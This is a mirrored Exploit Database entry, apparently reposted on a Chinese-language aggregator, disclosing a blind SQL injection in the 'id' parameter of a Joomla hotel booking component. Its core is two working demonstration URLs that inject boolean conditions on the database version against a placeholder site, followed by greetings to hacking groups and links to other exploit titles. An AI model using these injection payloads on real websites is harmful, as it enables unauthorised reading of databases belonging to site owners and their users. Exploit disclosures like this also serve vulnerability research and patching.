Joomla! Component Regional Booking – ‘id’ Blind SQL Injection

Exploit Database
9 阅读

作者： Hussin X

日期： 2010-01-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11061/

Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack

last Exploits
Joomla! Component Regional Booking – ‘id’ Blind SQL Injection的更多信息

osCommerce 2.3.4.1 – Arbitrary File Upload：
BSA Radar 1.6.7234.24750 – Authenticated Privilege Escalation：
Joomla! Component Timetable Schedule 3.6.8 – SQL Injection：
WordPress Theme Madebymilk – ‘id’ SQL Injection：
TRENDnet TEW-812DRU – Cross-Site Request Forgery/Command Injection Root：
RoSPORA 1.5.0 – Remote PHP Code Injection：
WordPress Plugin WP Symposium 15.1 – ‘&show=’ SQL Injection：
Atar2b CMS 4.0.1 – ‘pageE.php?id’ SQL Injection：